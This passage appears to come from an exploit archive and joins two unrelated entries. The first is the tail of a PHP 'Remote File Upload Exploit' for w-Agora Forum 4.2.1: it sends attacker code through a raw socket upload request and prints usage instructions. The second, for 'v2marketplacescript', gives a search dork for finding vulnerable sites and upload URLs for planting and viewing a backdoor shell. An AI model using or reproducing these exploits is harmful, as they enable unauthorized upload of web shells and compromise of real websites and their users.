    $part2     .=   $code."\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"Submit\"\r\n";
    $part2     .=   "Copy file\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    
    $part1     .=   "Content-Length: " . strlen($part2) . "\r\n\r\n";
    $part1     .=   $part2;


    fwrite($socket, $part1);


    echo "check the upload folder";
    
}
else
{
    echo "\n\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "|        w-Agora Forum 4.2.1 Remote File Upload Exploit          |\r\n";
    echo "|                   Treasure Security                           |\r\n";
    echo "|        by Treasure Priyamal                                   |\r\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "|        Usage: php exploit.php site.com /path/ user pass       |\r\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "\n\n";
}
?>

v2marketplacescript

v2marketplacescript




keydork        : "Copyright 2009 MarketplaceScript.net" or ur can modification
exploit        : http://localhost/path/upload_test.php  -- u can upload BackDooR shell -
                  http://localhost/path/upload_images.php  -- View BackDooR Shell -